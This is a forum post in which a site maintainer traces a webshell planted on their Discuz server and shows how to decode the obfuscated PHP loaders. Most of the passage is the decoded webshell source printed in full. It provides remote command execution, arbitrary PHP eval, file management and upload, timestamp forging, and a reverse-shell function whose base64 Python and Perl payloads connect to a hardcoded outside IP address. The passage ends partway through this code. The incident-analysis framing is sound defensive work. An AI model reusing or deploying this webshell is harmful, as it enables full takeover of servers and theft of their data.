[Approved] Tracing the attack after my server got pwned

Posted by 许繁 on 2018-3-30 17:35:30

- ## 0x01 Preface
    It started when my boss sent me a screenshot today:
> Dear 28*******@qq.com:
> Server Guard (安骑士) has detected a website backdoor file on your server 120.26.***.*** (iZ******).
> Please log in to the Cloud Shield (云盾) Server Guard console to confirm and handle the trojan file.


I was honestly impressed. The site I maintain is just a small site, and this... what a pain. Who thinks that highly of me??

- ## 0x02 First clues
    Server environment: `discuz magapp kodexporer phpmyadmin  lnmp  redis`. That is all that is on the box; there shouldn't be any major vulnerability in there, right?
    Log in to Server Guard and look at the details:
> /www/web/xxxx/public_html/template/strong_say/touch/common/tools_ajax.php  Download | Pending quarantine | 2018-02-09 05:02:10 | Webshell | Quarantine / Ignore
> /www/web/xxx/public_html/source/plugin/dzapp_hd/module/hd_seyu.php  Download | Pending quarantine | 2018-02-08 04:49:02 | Webshell | Quarantine / Ignore


Download both files.
File 1
```php
<?php
$SQPq='p'.'r'.'e'.'g'.'_re'.'pla'.'c'.'e';
$SQPq("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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'\x29\x29\x29\x3B",".");
?>

```
File 2
```php
<?php
$func="cr"."eat"."e_fun"."cti"."on";$cIZq=$func('$x','ev'.'al'.'("?>".gz'.'in'.'fla'.'te(ba'.'se'.'64'.'_de'.'co'.'de($x)));');$cIZq("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");
?>

```
- ## 0x03 Decoding the files

    The files are obviously encoded: preg_replace with the `e` modifier stands in for eval to execute the payload. Dump the arguments instead of executing them:
```
var_dump($SQPq);
$SQPq = 'var_dump'; // swap the callback for var_dump and look at what gets printed
```

which gives:
> string(5) "/.*/e"
string(13034) "eval(gzuncompress(base64_decode('eJztfWtzHEdy4GcqQv+....


Copy that string out, then hijack eval: replacing `eval` with `return` makes the wrapper hand back the decoded source instead of running it.
```php
$str = '...the whole encoded string from above, omitted here...';
$str2 = eval(str_replace("eval",'return',$str)); // now "return gzuncompress(base64_decode('...'));", which yields the plaintext
var_dump($str2);
file_put_contents("1res.php",$str2);
```

Decoded source:
```php
error_reporting(E_ERROR);
@ini_set('display_errors','Off');
@ini_set('max_execution_time',20000);
@ini_set('memory_limit','256M');
if(md5($_SERVER['HTTP_USER_AGENT']."KT1ypIeARt")
!== 'e87a2b5341a27ccdeaafcc167d5f0f2f' ||
md5($_SERVER['HTTP_3CEJNPXWAXN']."KT1ypIeARt")
!=='9c2bc4cba0afbead32963d742bf5e665'){
    header("HTTP/1.1 404 Not Found");
    echo 'No input file specified.';exit();
}
header("content-Type: text/html; charset=gb2312");
function strdir($str) { return str_replace(array('\\','//','%27','%22'),array('/','/','\'','"'),chop($str)); }
function chkgpc($array) { foreach($array as $key => $var) { $array[$key] = is_array($var) ? chkgpc($var) : stripslashes($var); } return $array; }
$myfile = $_SERVER['SCRIPT_FILENAME'] ? strdir($_SERVER['SCRIPT_FILENAME']) : strdir(__FILE__);
$myfile = strpos($myfile,'eval()') ? array_shift(explode('(',$myfile)) : $myfile;
define('THISDIR',strdir(dirname($myfile).'/'));
define('ROOTDIR',strdir(strtr($myfile,array(strdir($_SERVER['PHP_SELF']) => '')).'/'));
define('EXISTS_PHPINFO',getinfo() ? true : false);
if(get_magic_quotes_gpc()) { $_POST = chkgpc($_POST); }
$win = substr(PHP_OS,0,3) == 'WIN' ? true : false;
$msg = "信息回显";
function filew($filename,$filedata,$filemode) {
    if((!is_writable($filename)) && file_exists($filename)) { chmod($filename,0666); }
    $handle = fopen($filename,$filemode);
    $key = fputs($handle,$filedata);
    fclose($handle);
    return $key;
}
function filer($filename) {
    $handle = fopen($filename,'r');
    $filedata = fread($handle,filesize($filename));
    fclose($handle);
    return $filedata;
}
function fileu($filenamea,$filenameb) {
    $key = move_uploaded_file($filenamea,$filenameb) ? true : false;
    if(!$key) { $key = copy($filenamea,$filenameb) ? true : false; }
    return $key;
}
function filed($filename) {
    if(!file_exists($filename)) return false;
    ob_end_clean();
    $name = basename($filename);
    $array = explode('.',$name);
    header('Content-type: application/x-'.array_pop($array));
    header('Content-Disposition: attachment; filename='.$name);
    header('Content-Length: '.filesize($filename));
    @readfile($filename);
    exit;
}
function showdir($dir) {
    $dir = strdir($dir.'/');
    if(($handle = @opendir($dir)) == NULL) return false;
    $array = array();
    while(false !== ($name = readdir($handle))) {
        if($name == '.' || $name == '..') continue;
        $path = $dir.$name;
        $name = strtr($name,array('\'' => '%27','"' => '%22'));
        if(is_dir($path)) { $array['dir'][$path] = $name; }
        else { $array['file'][$path] = $name; }
    }
    closedir($handle);
    return $array;
}
function deltree($dir) {
    $handle = @opendir($dir);
    while(false !== ($name = @readdir($handle))) {
        if($name == '.' || $name == '..') continue;
        $path = $dir.$name;
        @chmod($path,0777);
        if(is_dir($path)) { deltree($path.'/'); }
        else { @unlink($path); }
    }
    @closedir($handle);
    return @rmdir($dir);
}
function size($bytes) {
    if($bytes < 1024) return $bytes.' B';
    $array = array('B','K','M','G','T');
    $floor = floor(log($bytes) / log(1024));
    return sprintf('%.2f '.$array[$floor],($bytes/pow(1024,floor($floor))));
}
function find($array,$string) {
    foreach($array as $key) { if(stristr($string,$key)) return true; }
    return false;
}
function scanfile($dir,$key,$inc,$fit,$tye,$chr,$ran,$now) {
    if(($handle = @opendir($dir)) == NULL) return false;
    while(false !== ($name = readdir($handle))) {
        if($name == '.' || $name == '..') continue;
        $path = $dir.$name;

        if(is_dir($path)) { if($fit && in_array($name,$fit)) continue; if($ran == 0 && is_readable($path)) scanfile($path.'/',$key,$inc,$fit,$tye,$chr,$ran,$now); }
        else {
            if($inc && (!find($inc,$name))) continue;
            $code = $tye ? filer($path) : $name;
            $find = $chr ? stristr($code,$key) : (strpos(size(filesize($path)),'M') ? false : (strpos($code,$key) > -1));
            if($find) {
                $file = strtr($path,array($now => '','\'' => '%27','"' => '%22'));
                echo '<a href="javascript:go(\'editor\',\''.$file.'\');">编辑</a> '.$path.'<br>';
                flush(); ob_flush();
            }
            unset($code);
        }
    }
    closedir($handle);
    return true;
}
function antivirus($dir,$exs,$matches,$now) {
    if(($handle = @opendir($dir)) == NULL) return false;
    while(false !== ($name = readdir($handle))) {
        if($name == '.' || $name == '..') continue;
        $path = $dir.$name;
        if(is_dir($path)) { if(is_readable($path)) antivirus($path.'/',$exs,$matches,$now); }
        else {
            $iskill = NULL;
            foreach($exs as $key => $ex) { if(find(explode('|',$ex),$name)) { $iskill = $key; break; } }
            if(strpos(size(filesize($path)),'M')) continue;
            if($iskill) {
                $code = filer($path);
                foreach($matches[$iskill] as $matche) {
                    $array = array();
                    preg_match($matche,$code,$array);
                    if(strpos($array[0],'$this->') || strpos($array[0],'[$vars[')) continue;
                    $len = strlen($array[0]);
                    if($len > 6 && $len < 200) {
                        $file = strtr($path,array($now => '','\'' => '%27','"' => '%22'));

                        echo '特征 <input type="text" value="'.htmlspecialchars($array[0]).'"> <a href="javascript:go(\'editor\',\''.$file.'\');">编辑</a> '.$path.'<br>';
                        flush(); ob_flush(); break;
                    }
                }
                unset($code,$array);
            }
        }
    }
    closedir($handle);
    return true;
}
function command($cmd,$cwd,$com = false) {
    $iswin = substr(PHP_OS,0,3) == 'WIN' ? true : false; $res = $msg = '';
    if($cwd == 'com' || $com) {
        if($iswin && class_exists('COM')) {
            $wscript = new COM('Wscript.Shell');
            $exec = $wscript->exec('c:\\windows\\system32\\cmd.exe /c '.$cmd);
            $stdout = $exec->StdOut();
            $res = $stdout->ReadAll();
            $msg = 'Wscript.Shell';
        }
    } else {
        chdir($cwd); $cwd = getcwd();
        if(function_exists('exec')) { @exec ($cmd,$res); $res = join("\n",$res); $msg = 'exec'; }
        elseif(function_exists('shell_exec')) { $res = @shell_exec ($cmd); $msg = 'shell_exec'; }

        elseif(function_exists('system')) { ob_start(); @system ($cmd); $res = ob_get_contents(); ob_end_clean(); $msg = 'system'; }
        elseif(function_exists('passthru')) { ob_start(); @passthru ($cmd); $res = ob_get_contents(); ob_end_clean(); $msg = 'passthru'; }
        elseif(function_exists('popen')) { $fp = @popen ($cmd,'r'); if($fp) { while(!feof($fp)) { $res .= fread($fp,1024); } } @pclose($fp); $msg = 'popen'; }
        elseif(function_exists('proc_open')) {
            $env = $iswin ? array('path' => 'c:\\windows\\system32') : array('path' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');
            $des = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w"));
            $process = @proc_open ($cmd,$des,$pipes,$cwd,$env);
            if(is_resource($process)) { fwrite($pipes[0],$cmd); fclose($pipes[0]); $res .= stream_get_contents($pipes[1]); fclose($pipes[1]); $res .= stream_get_contents($pipes[2]); fclose($pipes[2]); }
            @proc_close($process);
            $msg = 'proc_open';
        }
    }
    $msg = $res == '' ? '<h1>NULL</h1>' : '<h2>利用'.$msg.'执行成功</h2>';
    return array('res' => $res,'msg' => $msg);
}
function backshell($ip,$port,$dir,$type) {
    $key = false;
    $c_bin = '';
    switch($type) {
        case "pl" :

        $shell = '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';
        $file = strdir($dir.'/t00ls.pl');
        $key = filew($file,base64_decode($shell),'w');
        if($key) { @chmod($file,0777); command('/usr/bin/perl '.$file.' '.$ip.' '.$port,$dir); }
        break;
        case "py" :

        $shell = 'IyEvdXNyL2Jpbi9weXRob24NCiMgDQppbXBvcnQgc3lzLG9zLHNvY2tldCxwdHkNCnMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pDQpzLmNvbm5lY3QoKHN5cy5hcmd2WzFdLCBpbnQoc3lzLmFyZ3ZbMl0pKSkNCm9zLmR1cDIocy5maWxlbm8oKSwgc3lzLnN0ZGluLmZpbGVubygpKQ0Kb3MuZHVwMihzLmZpbGVubygpLCBzeXMuc3Rkb3V0LmZpbGVubygpKQ0Kb3MuZHVwMihzLmZpbGVubygpLCBzeXMuc3RkZXJyLmZpbGVubygpKQ0KcHR5LnNwYXduKCcvYmluL3NoJykNCg==';
        $file = strdir($dir.'/t00ls.py');
        $key = filew($file,base64_decode($shell),'w');
        if($key) { @chmod($file,0777); command('/usr/bin/python '.$file.' '.$ip.' '.$port,$dir); }
        break;
        case "pcntl" :
        $file = strdir($dir.'/t00ls');
        $key = filew($file,base64_decode($c_bin),'wb');
        if($key) { @chmod($file,0777); if(function_exists('pcntl_exec')) { @pcntl_exec($file,array($ip,$port)); } }
        break;
    }
    if(!$key) { $msg = '<h1>临时目录不可写</h1>'; } else { @unlink($file); $msg = '<h2>CLOSE</h2>'; }
    return $msg;
}
function getinfo() {
    return function_exists('phpinfo');
}
if(isset($_POST['action'])) {
    if($_POST['action'] == 'down') {
        $downfile = $fileb = strdir($_POST["rsv_bp"].'/'.$_POST["wd"]);
        if(!filed($downfile)) { $msg = '<h1>下载文贱不存在</h1>'; }
    }
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<style type="text/css">
* {margin:0px;padding:0px;}
body {background:#000000;color:#333333;font-size:13px;font-family:Verdana,Arial,SimSun,sans-serif;text-align:left;word-wrap:break-word;word-break:break-all;}
a{color:#000000;text-decoration:none;vertical-align:middle;}
a:hover{color:#FF0000;text-decoration:underline;}
p {padding:1px;line-height:1.6em;}
h1 {color:#CD3333;font-size:13px;display:inline;vertical-align:middle;}
h2 {color:#008B45;font-size:13px;display:inline;vertical-align:middle;}
form {display:inline;}
input,select { vertical-align:middle; }
input[type=text], textarea {padding:1px;font-family:Courier New,Verdana,sans-serif;}
input[type=submit], input[type=button] {height:21px;}
.tag {text-align:center;background:threedface;height:25px;padding-top:5px;}
.tag a {background:#FAFAFA;color:#333333;width:90px;height:20px;display:inline-block;font-size:15px;font-weight:bold;padding-top:5px;}
.tag a:hover, .tag a.current {background:#CCC333;color:#000000;text-decoration:none;}
.main {width:963px;margin:0 auto;padding:10px;}
.outl {border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;}
.toptag {padding:5px;text-align:left;font-weight:bold;color:#FFFFFF;background:#293F5F;}
.footag {padding:5px;text-align:center;font-weight:bold;color:#000000;background:#999999;}
.msgbox {padding:5px;background:#CCC333;text-align:center;vertical-align:middle;}
.actall {background:#F9F6F4;text-align:center;font-size:15px;border-bottom:1px solid #999999;padding:3px;vertical-align:middle;}
.tables {width:100%;}
.tables th {background:threedface;text-align:left;border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;padding:2px;}
.tables td {background:#F9F6F4;height:19px;padding-left:2px;}
</style>
<script type="text/javascript">
function $(ID) { return document.getElementById(ID); }
function sd(str) { str = str.replace(/%22/g,'"'); str = str.replace(/%27/g,"'"); return str; }
function cd(dir) { dir = sd(dir); $('rsv_t').value = dir; $('frm').submit(); }
function sa(form) { for(var i = 0;i < form.elements.length;i++) { var e = form.elements[i]; if(e.type == 'checkbox') { if(e.name != 'chkall') { e.checked = form.chkall.checked; } } } }
function go(a,b) { b = sd(b); $('action').value = a; $("wd").value = b; if(a == 'editor') { $('gofrm').target = "_blank"; } else { $('gofrm').target = ""; } $('gofrm').submit(); }
function nf(a,b) { re = prompt("新建名",b); if(re) { $('action').value = a; $("wd").value = re; $('gofrm').submit(); } }
function dels(a) { if(a == 'b') { var msg = "所选文贱"; $('act').value = a; } else { var msg = "目录"; $('act').value = 'deltree'; $('var').value = a; } if(confirm("确定要删"+msg+"吗")) { $('frm1').submit(); } }
function txts(m,p,a) { p = sd(p); re = prompt(m,p); if(re) { $('var').value = re; $('act').value = a; $('frm1').submit(); } }
function acts(p,a,f) { p = sd(p); f = sd(f); re = prompt(f,p); if(re) { $('var').value = re+'|x|'+f; $('act').value = a; $('frm1').submit(); } }
</script>
<title><?php echo VERSION.' - 【'.date('Y-m-d H:i:s 星期N',time()).'】';?></title>
</head>
<body>
<div class="main">
    <div class="outl">

    <div class="toptag"><?php echo ($_SERVER['SERVER_ADDR'] ? $_SERVER['SERVER_ADDR'] : gethostbyname($_SERVER['SERVER_NAME'])).' - '.php_uname().'';?></div>
<?php
$menu = array('file' => '文贱管理','1' => '反谈端口','2' => '执行密令','3' => '执行PHP','4' => '系统信息');
$go = array_key_exists($_POST['action'],$menu) ? $_POST['action'] : 'file';
$nowdir = isset($_POST['rsv_t']) ? strdir(chop($_POST['rsv_t']).'/') : THISDIR;
echo '<div class="tag">';
foreach($menu as $key => $name) { echo '<a'.($go == $key ? ' class="current"' : '').' href="javascript:go(\''.$key.'\',\''.$nowdir.'\');">'.$name.'</a> '; }
echo '</div>';

echo '<form name="gofrm" id="gofrm" method="POST">';;
echo '<input type="hidden" name="action" id="action" value="">';
echo '<input type="hidden" name="rsv_bp" id="rsv_bp" value="'.$nowdir.'">';
echo '<input type="hidden" name="wd" id="wd" value="">';
echo '</form>';
switch($_POST['action']) {
case "4" :
if(EXISTS_PHPINFO) {
    ob_start();
    phpinfo(INFO_GENERAL);
    $out = ob_get_contents();
    ob_end_clean();
    $tmp = array();

    preg_match_all('/\<td class\=\"e\"\>.*?(Command|Configuration)+.*?\<\/td\>\<td class\=\"v\"\>(.*?)\<\/td\>/i',$out,$tmp);
    $config = $tmp[2][0];
    $phpini = $tmp[2][2] ? $tmp[2][1].' --- '.$tmp[2][2] : $tmp[2][1];
}
$infos = array(
    '限制目录' => ini_get('open_basedir'),
    '系统版本' => php_uname(),
    '系统环境' => $_SERVER['SERVER_SOFTWARE'],
    '被禁用的函数' => get_cfg_var("disable_functions") ? get_cfg_var("disable_functions") : '(无)',
    '被禁用的类' => get_cfg_var("disable_classes") ? get_cfg_var("disable_classes") : '(无)',
    'PHP.ini配置路径' => $phpini ? $phpini : '(无)',
    'PHP运行方式' => php_sapi_name(),
    'PHP版本' => PHP_VERSION,
    'PHP进程PID' => getmypid(),
    'Web服务端口' => $_SERVER['SERVER_PORT'],
    'Web根目录' => $_SERVER['DOCUMENT_ROOT'],
    'Web执行脚本' => $_SERVER['SCRIPT_FILENAME'],
    'Web规范CGI版本' => $_SERVER['GATEWAY_INTERFACE'],
    'Web管理员Email' => $_SERVER['SERVER_ADMIN'] ? $_SERVER['SERVER_ADMIN'] : '(无)',
    '当前磁盘总大小' => size(disk_total_space('.')),
    '当前磁盘可用空间' => size(disk_free_space('.')),
    '是否支持Pcntl' => function_exists('pcntl_exec') ? '是' : '否',
    '是否运行于安全模式' => get_cfg_var("safemode") ? '是' : '否',
    '是否允许动态加载链接库' => get_cfg_var("enable_dl") ? '是' : '否',
    '是否显示错误信息' => get_cfg_var("display_errors") ? '是' : '否',
    '是否自动注册全局变量' => get_cfg_var("register_globals") ? '是' : '否',
    '是否使用反斜线引用字符串' => get_cfg_var("magic_quotes_gpc") ? '是' : '否',
    'PHP编译参数' => $config ? $config : '(无)'
);
echo '<div class="msgbox">'.$msg.'</div>';
echo '<table class="tables"><tr><th style="width:26%;">名称</th><th>参数</th></tr>';
foreach($infos as $name => $var) { echo '<tr><td>'.$name.'</td><td>'.$var.'</td></tr>'; }
echo '</table>';
break;
case "2" :
$cmd = $win ? 'dir' : 'ls -al';
$res = array('res' => '命令回显','msg' => $msg);
$str = isset($_POST['str']) ? $_POST['str'] : 'fun';
if(isset($_POST['rsv_pq'])) {
    $cmd = $_POST['rsv_pq'];
    $cwd = $str == 'fun' ? THISDIR : 'com';
    $res = command($cmd,$cwd);
}
echo '<div class="msgbox">'.$res['msg'].'</div>';
echo '<form method="POST">';;
echo '<input type="hidden" name="action" id="action" value="2">';
echo '<div class="actall">命令 <input type="text" name="rsv_pq" id="rsv_pq" value="'.htmlspecialchars($cmd).'" style="width:398px;"> ';
echo '<select name="str">';
$selects = array('fun' => 'phpfun','com' => 'wscript');
foreach($selects as $var => $name) { echo '<option value="'.$var.'"'.($var == $str ? ' selected' : '').'>'.$name.'</option>'; }
echo '</select> ';
echo '<input type="submit" style="width:50px;" value="执行">';
echo '</div><div class="actall"><textarea style="width:698px;height:368px;">'.htmlspecialchars($res['res']).'</textarea></div></form>';
break;
case "3" :
if(isset($_POST['phpcode'])) {
    $phpcode = chop($_POST['phpcode']);
    ob_start();
    if(substr($phpcode,0,2) == '<?' && substr($phpcode,-2) == '?>') { @eval ('?>'.$phpcode.'<?php '); }
    else { @eval ($phpcode); }
    $out = ob_get_contents();
    ob_end_clean();
} else {
    $phpcode = 'phpinfo();';
    $out = '回显窗口';
}
echo base64_decode('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmZ1bmN0aW9uIHJ1bmNvZGUob2JqbmFtZSkge3ZhciB3aW5uYW1lID0gd2luZG93Lm9wZW4oJycsIl9ibGFuayIsJycpO3ZhciBvYmogPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZChvYmpuYW1lKTt3aW5uYW1lLmRvY3VtZW50Lm9wZW4oJ3RleHQvaHRtbCcsJ3JlcGxhY2UnKTt3aW5uYW1lLm9wZW5lciA9IG51bGw7d2lubmFtZS5kb2N1bWVudC53cml0ZShvYmoudmFsdWUpO3dpbm5hbWUuZG9jdW1lbnQuY2xvc2UoKTt9PC9zY3JpcHQ+');
echo '<div class="msgbox">'.$msg.'</div>';
echo '<form method="POST">';
echo '<input type="hidden" name="action" id="action" value="3">';
echo '<div class="actall"><p><textarea name="phpcode" id="phpcode" style="width:698px;height:180px;">'.htmlspecialchars($phpcode).'</textarea></p><p>';
echo '<input type="submit" style="width:80px;" value="执行"></p></div>';
echo '</form><div class="actall"><p><textarea id="evalcode" style="width:698px;height:180px;">'.htmlspecialchars($out).'</textarea></p><p><input type="button" value="以HTML运行以上代码" onclick="runcode(\'evalcode\')"></p></div>';
break;
case "1" :
if((!empty($_POST['backip'])) && (!empty($_POST['backport']))) {
    $backip = $_POST['backip'];
    $backport = $_POST['backport'];
    $temp = $_POST['temp'] ? $_POST['temp'] : '/tmp';
    $type = $_POST['type'];
    $msg = backshell($backip,$backport,$temp,$type);
} else {
    $backip = '222.73.219.91';
    $backport = '443';
    $temp = '/tmp';
    $type = 'pl';
}
echo '<div class="msgbox">'.$msg.'</div>';
echo '<form method="POST">';
echo '<input type="hidden" name="action" id="action" value="1">';
echo '<table class="tables"><tr><th style="width:15%;">名称</th><th>设置</th></tr>';
echo '<tr><td>反谈地址</td><td><input type="text" name="backip" style="width:268px;" value="'.$backip.'"> (Your ip)</td></tr>';
echo '<tr><td>反谈端口</td><td><input type="text" name="backport" style="width:268px;" value="'.$backport.'"> (nc -vvlp '.$backport.')</td></tr>';
echo '<tr><td>临时目录</td><td><input type="text" name="temp" style="width:268px;" value="'.$temp.'"> (Only Linux)</td></tr>';
echo '<tr><td>反谈方法</td><td>';
$types = array('pl' => 'Perl','py' => 'Python','pcntl' => 'Pcntl','php' => 'PHP','phpwin' => 'PHP-WS');
foreach($types as $key => $name) { echo '<label><input type="radio" name="type" value="'.$key.'"'.($key == $type ? ' checked' : '').'>'.$name.'</label> '; }
echo '</td></tr><tr><td>操作</td><td><input type="submit" style="width:80px;" value="反谈"></td></tr>';
echo '</table></form>';
break;
case "edit" : case "editor" :
$file = strdir($_POST["rsv_bp"].'/'.$_POST["wd"]);
$iconv = function_exists('iconv');
if(!file_exists($file)) {
    $msg = '【新建文贱】';
} else {
    $code = filer($file);
    $chst = '默认';
    $size = size(filesize($file));
    $msg = '【文贱属性 '.substr(decoct(fileperms($file)),-4).'】 【文贱大小 '.$size.'】 【文贱编码 '.$chst.'】';
}
echo '<div class="msgbox"><input name="keyword" id="keyword" type="text" style="width:138px;height:15px;"> - '.$msg.'</div>';
echo '<form name="editfrm" id="editfrm" method="POST">';
echo '<input type="hidden" name="action" value=""><input type="hidden" name="act" id="act" value="edit">';
echo '<input type="hidden" name="rsv_t" id="rsv_t" value="'.dirname($file).'">';
echo '<div class="actall">文贱 <input type="text" name="filename" value="'.$file.'" style="width:528px;"> ';
echo '</div><div class="actall"><textarea name="filecode" id="filecode" style="width:698px;height:358px;">'.htmlspecialchars($code).'</textarea></div></form>';
echo '<div class="actall" style="padding:5px;padding-right:68px;"><input type="button" onclick="$(\'editfrm\').submit();" value="保存" style="width:80px;"> ';
echo '<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="action" value=""><input type="hidden" name="rsv_t" id="rsv_t" value="'.dirname($file).'">';
echo '<input type="button" onclick="$(\'backfrm\').submit();" value="返回" style="width:80px;"></form></div>';
break;
case "upfiles" :
$updir = isset($_POST['updir']) ? $_POST['updir'] : $_POST["rsv_bp"];
$msg = '【最大上船文贱 '.get_cfg_var("upload_max_filesize").'】 【POST最大提交数据 '.get_cfg_var("post_max_size").'】';
$max = 10;
if(isset($_FILES['uploads']) && isset($_POST['renames'])) {
    $uploads = $_FILES['uploads'];
    $msgs = array();
    for($i = 1;$i < $max;$i++) {
        if($uploads['error'][$i] == UPLOAD_ERR_OK) {
            $rename = $_POST['renames'][$i] == '' ? $uploads['name'][$i] : $_POST['renames'][$i];
            $filea = $uploads['tmp_name'][$i];
            $fileb = strdir($updir.'/'.$rename);

            $msgs[$i] = fileu($filea,$fileb) ? '<br><h2>上船成功 '.$rename.'</h2>' : '<br><h1>上船失败 '.$rename.'</h1>';
        }
    }
}
echo '<div class="msgbox">'.$msg.'</div>';
echo '<form name="upsfrm" id="upsfrm" method="POST" enctype="multipart/form-data">';
echo '<input type="hidden" name="action" value="upfiles"><input type="hidden" name="act" id="act" value="upload">';
echo '<div class="actall"><p>上船到目录 <input type="text" name="updir" style="width:398px;" value="'.$updir.'"></p>';
for($i = 1;$i < $max;$i++) { echo '<p>附贱'.$i.' <input type="file" name="uploads['.$i.']" style="width:300px;"> 重命名 <input type="text" name="renames['.$i.']" style="width:128px;"> '.$msgs[$i].'</p>'; }
echo '</div></form><div class="actall" style="padding:8px;padding-right:68px;"><input type="button" onclick="$(\'upsfrm\').submit();" value="上船" style="width:80px;"> ';
echo '<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="action" value=""><input type="hidden" name="rsv_t" id="rsv_t" value="'.$updir.'">';
echo '<input type="button" onclick="$(\'backfrm\').submit();" value="返回" style="width:80px;"></form></div>';
break;

default :

if(isset($_FILES['upfile'])) {
    if($_FILES['upfile']['name'] == '') { $msg = '<h1>请选择文贱</h1>'; }

    else { $rename = $_POST['rename'] == '' ? $_FILES['upfile']['name'] : $_POST['rename']; $filea = $_FILES['upfile']['tmp_name']; $fileb = strdir($nowdir.$rename); $msg = fileu($filea,$fileb) ? '<h2>上船文贱'.$rename.'成功</h2>' : '<h1>上船文贱'.$rename.'失败</h1>'; }
}

if(isset($_POST['act'])) {
    switch($_POST['act']) {
        case "a" :
            if(!$_POST['files']) { $msg = '<h1>请选择文贱 '.$_POST['var'].'</h1>'; }

            else { $i = 0; foreach($_POST['files'] as $filename) { $i += @copy(strdir($nowdir.$filename),strdir($_POST['var'].'/'.$filename)) ? 1 : 0; } $msg = $i ? '<h2>共复制 '.$i.' 个文贱到'.$_POST['var'].'成功</h2>' : '<h1>共复制 '.$i.' 个文贱到'.$_POST['var'].'失败</h1>'; }
        break;
        case "b" :
            if(!$_POST['files']) { $msg = '<h1>请选择文贱</h1>'; }

            else { $i = 0; foreach($_POST['files'] as $filename) { $i += @unlink(strdir($nowdir.$filename)) ? 1 : 0; } $msg = $i ? '<h2>共删 '.$i.' 个文贱成功</h2>' : '<h1>共删 '.$i.' 个文贱失败</h1>'; }
        break;
        case "c" :
            if(!$_POST['files']) { $msg = '<h1>请选择文贱 '.$_POST['var'].'</h1>'; }
            elseif(!ereg("^[0-7]{4}$",$_POST['var'])) { $msg = '<h1>属性值错误</h1>'; }
            else { $i = 0; foreach($_POST['files'] as $filename) { $i += @chmod(strdir($nowdir.$filename),base_convert($_POST['var'],8,10)) ? 1 : 0; } $msg = $i ? '<h2>共 '.$i.' 个文贱修改属性为'.$_POST['var'].'成功</h2>' : '<h1>共 '.$i.' 个文贱修改属性为'.$_POST['var'].'失败</h1>'; }
        break;
        case "d" :
            if(!$_POST['files']) { $msg = '<h1>请选择文贱 '.$_POST['var'].'</h1>'; }

            elseif(!preg_match('/(\d+)-(\d+)-(\d+) (\d+):(\d+):(\d+)/',$_POST['var'])) { $msg = '<h1>时间格式错误 '.$_POST['var'].'</h1>'; }
            else { $i = 0; foreach($_POST['files'] as $filename) { $i += @touch(strdir($nowdir.$filename),strtotime($_POST['var'])) ? 1 : 0; } $msg = $i ? '<h2>共 '.$i.' 个文贱修改时间为'.$_POST['var'].'成功</h2>' : '<h1>共 '.$i.' 个文贱修改时间为'.$_POST['var'].'失败</h1>'; }
        break;
        case "e" :
            $path = strdir($nowdir.$_POST['var'].'/');
            if(file_exists($path)) { $msg = '<h1>目录已存在 '.$_POST['var'].'</h1>'; }

            else { $msg = @mkdir($path,0777) ? '<h2>创建目录 '.$_POST['var'].' 成功</h2>' : '<h1>创建目录 '.$_POST['var'].' 失败</h1>'; }
        break;
        case "f" :
            $context = array('http' => array('timeout' => 30));
            if(function_exists('stream_context_create')) { $stream = stream_context_create($context); }
            $data = @file_get_contents ($_POST['var'],false,$stream);
            $filename = array_pop(explode('/',$_POST['var']));

            if($data) { $msg = filew(strdir($nowdir.$filename),$data,'wb') ? '<h2>下载 '.$filename.' 成功</h2>' : '<h1>下载 '.$filename.' 失败</h1>'; } else { $msg = '<h1>下载失败或不支持下载</h1>'; }
        break;
        case "rf" :
            $files = explode('|x|',$_POST['var']);
            if(count($files) != 2) { $msg = '<h1>输入错误</h1>'; }

            else { $msg = @rename(strdir($nowdir.$files[1]),strdir($nowdir.$files[0])) ? '<h2>重命名 '.$files[1].' 为 '.$files[0].' 成功</h2>' : '<h1>重命名 '.$files[1].' 为 '.$files[0].' 失败</h1>'; }
        break;
        case "pd" :
            $files = explode('|x|',$_POST['var']);
            if(count($files) != 2) { $msg = '<h1>输入错误</h1>'; }

            else { $path = strdir($nowdir.$files[1]); $msg = @chmod($path,base_convert($files[0],8,10)) ? '<h2>修改'.$files[1].'属性为'.$files[0].'成功</h2>' : '<h1>修改'.$files[1].'属性为'.$files[0].'失败</h1>'; }
        break;
        case "edit" :

            if(isset($_POST['filename']) && isset($_POST['filecode'])) { if($_POST['tostr'] == 'utf') { $_POST['filecode'] = @iconv('GB2312//IGNORE','UTF-8',$_POST['filecode']); } $msg = filew($_POST['filename'],$_POST['filecode'],'w') ? '<h2>保存成功 '.$_POST['filename'].'</h2>' : '<h1>保存失败 '.$_POST['filename'].'</h1>'; }
        break;
        case "deltree" :
            $deldir = strdir($nowdir.$_POST['var'].'/');
            if(!file_exists($deldir)) { $msg = '<h1>目录 '.$_POST['var'].' 不存在</h1>'; }

            else { $msg = deltree($deldir) ? '<h2>删目录 '.$_POST['var'].' 成功</h2>' : '<h1>删目录 '.$_POST['var'].' 失败</h1>'; }
        break;
    }
}
$chmod = substr(decoct(fileperms($nowdir)),-4);
if(!$chmod) { $msg .= ' - <h1>无法读取目录</h1>'; }
$array = showdir($nowdir);
$thisurl = strdir('/'.strtr($nowdir,array(ROOTDIR => '')).'/');
$nowdir = strtr($nowdir,array('\'' => '%27','"' => '%22'));
echo '<div class="msgbox">'.$msg.'</div>';
echo '<div class="actall"><form name="frm" id="frm" method="POST">';
echo (is_writable($nowdir) ? '<h2>路径</h2>' : '<h1>路径</h1>').' <input type="text" name="rsv_t" id="rsv_t" style="width:508px;" value="'.strdir($nowdir.'/').'"> ';
echo '<input type="button" onclick="$(\'frm\').submit();" style="width:50px;" value="转到"> ';
